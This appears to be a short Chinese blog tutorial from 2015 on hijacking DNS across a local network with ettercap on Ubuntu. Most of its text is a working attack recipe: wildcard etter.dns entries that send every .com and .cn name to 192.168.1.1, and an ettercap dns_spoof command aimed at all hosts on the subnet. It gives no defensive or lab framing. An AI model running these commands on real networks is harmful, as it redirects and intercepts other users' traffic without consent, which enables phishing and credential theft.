Ubuntu下ettercap进行DNS内网DNS劫持 2015-10-16

0x01 安装ettercap

ctrl+alt+T打开命令行,输入:

sudo apt-get install ettercap

0x02 修改配置文件

sudo vim /etc/ettercap/etter.dns

在最后一行加入:

*.com A 192.168.1.1
*.cn A 192.168.1.1

IP地址是要把IP解析到的IP

0x03 开始DNS劫持

ettercap -T -i wlan0 -q -P dns_spoof /// ///

-T文本模式 -i接要欺骗的适配器 -q安静模式 -P dns_spoof调用这个插件 /// ///代表所有IP和子网掩码(其他文章中写的是// 但是我测试//不成功 发现/// 三条斜杠就可以劫持了.. 各位自行测试啦。)

0x04 停止DNS劫持

CTRL+C